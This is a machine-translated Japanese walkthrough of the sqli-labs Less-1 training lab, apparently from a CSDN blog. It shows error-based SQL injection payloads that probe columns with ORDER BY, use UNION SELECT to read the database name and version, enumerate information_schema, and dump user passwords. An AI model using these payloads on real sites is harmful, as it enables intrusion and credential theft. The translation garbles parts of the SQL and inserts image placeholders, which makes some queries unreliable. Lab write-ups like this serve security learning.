sqli-labs/less-1: エラープロンプトに基づく SQL インジェクション

Less-1 を開いて、大手の記事で行われた SQL インジェクションに従って上記のインターフェイスを取得します。ページのプロンプト: URL を構築するには、最初に
ここに画像の説明を挿入します数値範囲内の ID を入力してください。?id=1 は次のインターフェイスを取得します。次にテストします。順番に下に見ていき、id=13 を見つけます。情報は表示されません。id =1' order by 1,'1 と入力すると、ページは id=1 を入力したのと同じですが、SQL ステートメントは次のようになるため、構文エラーは発生しません。 id='1' 1 ずつ並べます。' 1'。したがって、1 つずつ試してみると、order by 2 と 3 の両方で情報が表示され、id=1' order by 4,'1 と新しい情報が表示され、このテーブルには 3 つのフィールドしかないことがわかります。 select: id =1' を構築するには Union select 1,2,3 order by 1,'1新しいユーザーとパスワードが表示されます。ただし、データベース名と MySQL のバージョンを確認する必要がある場合は、ID=13 に設定する必要があります。これは、Web ページではテーブルの最初の行しか表示できないためです。新しい情報を表示したい場合は、上書きする必要があります。以前の情報と ID =13 を使用すると、情報がない特性に新しい情報が表示されることがあります。以下はスプライシング関数の使用法です。construct ?id=13' Union select 1,2,concat_ws(':',database(),version(),user()) order by 1,'1 で URL を構築します。 query table information : 13' Union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' order by 1,'14つのテーブルのみが存在し、その後、users フィールドをクエリできます

ここに画像の説明を挿入します
ここに画像の説明を挿入します
ここに画像の説明を挿入します
ここに画像の説明を挿入します
ここに画像の説明を挿入します

ここに画像の説明を挿入します
ここに画像の説明を挿入します
Construct id=13' Union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' および table_schema='security' order by 1,'1すべてのフィールドを結合できるフィールドは、ユーザー名とパスワードの 2 つだけ
ここに画像の説明を挿入しますです
Construct
id=13' Union select 1,2,group_concat(concat_ws(':',id,username,password)) ユーザーからの 1,'1 以上の順序でインジェクションを完了します
ここに画像の説明を挿入します

Acho que você gosta

Origin blog.csdn.net/weixin_44236278/article/details/97925373
Recomendado
Clasificación